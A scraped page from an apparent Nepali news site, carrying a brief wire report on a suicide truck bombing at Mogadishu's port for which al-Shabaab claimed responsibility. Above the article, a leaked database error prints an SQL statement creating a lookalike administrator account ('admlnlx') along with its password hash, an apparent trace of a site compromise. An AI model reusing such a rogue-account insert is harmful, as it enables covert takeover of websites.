WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5w63Nu5M9IgNhbJUxRXBgFh1N.wr/0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 04:48:44', '', 'admlnlx', 'admlnlx')
मोगादिशु, मंसिर २६–
सोमालियाको राजधानी मोगादिशुको समुन्द्र बन्दरगाहमा आईतबार विहानै भएको आत्मघाती ट्रक बम हमलामा परी कम्तीमा १६ जनाको मृत्यु भएको छ ।
“हामीले घाइते ४८ जनालाई उद्धार गरेका छौं, अन्य १६ जनाको विस्फोटमा मृत्यु भइसकेको छ,” मोगादिशुको एम्बुलेन्स सेवाका निर्देशक अब्दीकादीर अब्दीराहमान अदेमले भन्नुभयो ।
मोगादिशुका स्थानीय बासिन्दाले बम विस्फोट भएपछि धुवाँको मुस्लो माथी आकाशमा देखिएको बताएका छन् ।
स्थानीय प्रशासनका एक जना प्रवक्ताले बिस्फोट भएको पुष्टी गर्दै झण्डै १० जनाको मृत्यु भएको जानकारी दिएका छन् । उहाँले घटनाका बारेमा थप अनुसन्धान भईरहेको पनि बताउनु भएको छ । अल कायदासँग आवद्ध साबाब आतङ्ककारी समूहले यस आक्रमणको जिम्मा लिएको छ ।
साबाब नाम विद्रोही सङगठनले केही समयदेखि सोमालिया सरकार, सुरक्षा फौज र आम नागरिकलाई लक्षित गरेर हिंसात्मक गतिविधिहरु गर्दै आईरहेका छन् । –रासस/एएफपी